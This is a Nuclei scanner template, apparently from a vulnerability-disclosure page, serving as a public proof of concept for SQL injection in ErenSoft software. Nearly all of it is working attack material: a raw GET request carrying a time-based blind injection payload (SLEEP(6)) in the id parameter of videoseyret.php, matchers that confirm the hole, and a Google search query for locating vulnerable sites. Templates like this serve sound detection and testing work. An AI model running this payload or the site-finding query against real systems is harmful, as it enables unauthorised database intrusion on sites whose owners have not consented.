漏洞描述
SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
erensoft-sqli: ErenSoft - SQL Injection
PoC代码[已公开]
id: erensoft-sqli
info:
name: ErenSoft - SQL Injection
author: r3Y3r53
severity: high
description: |
SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
reference:
- https://cxsecurity.com/issue/WLB-2023070055
metadata:
verified: true
max-request: 1
google-query: intext:"Kodlama:Erensoft"
tags: sqli,unauth,erensoft,vuln
http:
- raw:
- |
@timeout: 20s
GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration >= 6
- status_code == 200
- contains(content_type, "text/html") && contains(body, "videoseyret")
condition: and
- type: word
words:
- class="entry-title"
# digest: 490a0046304402200cd0e377b4a725821564334c2b03d1345b1ae77ccfccf5d230ace6f2b2d5cc2b022004ae5efbe57fb13d19c04d05cd12afc68d2cc2da71041dab057ec8f9e2b57a21:922c64590222798bb761d5b6d8e72950